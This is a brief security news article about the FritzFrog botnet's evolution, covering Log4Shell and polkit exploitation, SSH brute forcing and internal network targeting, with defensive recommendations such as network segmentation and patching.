The FritzFrog botnet, first identified in 2020, is a sophisticated peer-to-peer botnet created in Golang that has the capability to operate on AMD and ARM-based devices. The malware, which has been constantly updated, has evolved over time, adding and enhancing its features.
Recently, a new strain of the FritzFrog botnet was discovered exploiting the Log4Shell vulnerability to target all hosts within the internal network. In addition, the malware attacks servers accessible over the internet by using weak SSH credentials.
The newer versions of the FritzFrog botnet are more sophisticated and now read several system files on compromised hosts to detect potential targets that are highly likely to be vulnerable. This allows the malware to identify and exploit specific vulnerabilities on targeted systems more efficiently.
The exploitation chain used by FritzFrog has evolved over time. While the only infection vector previously used was SSH brute force, more recent iterations of the malware have added the Log4Shell exploitation, referred to as “Frog4Shell.”
The Log4Shell vulnerability was discovered in the popular open-source Log4j web tool in 2021, prompting a global effort to patch the technology. Presently, the malware targets every host on the internal network as part of its routine for spreading, attempting to connect to every address on the local network.
According to researchers, internal computers, which were less likely to be exploited, were frequently overlooked and went unpatched—a situation that FritzFrog takes advantage of.
FritzFrog has also expanded its targeting capabilities by searching for HTTP servers on specific ports to identify possible Log4Shell targets. It has also enhanced its ability to identify SSH brute force targets by counting multiple system logs on each of its victims and targeting randomly generated IP addresses.
Additionally, the malware now includes a module that exploits CVE-2021-4034, a privilege escalation in the polkit Linux component, allowing the malware to operate as root on vulnerable servers.
In response to the evolving threat posed by FritzFrog, researchers have recommended implementing network segmentation to prevent the lateral movement of the malware. They have also provided a FritzFrog detection script for use on SSH servers, which searches for specific indicators of the malware’s presence.
Overall, the discovery and continued evolution of the FritzFrog botnet highlights the importance of ongoing vigilance and proactive measures to mitigate the threat posed by sophisticated malware. It also serves as a reminder of the critical need for timely software updates and security patches to protect against emerging vulnerabilities that can be exploited by threat actors.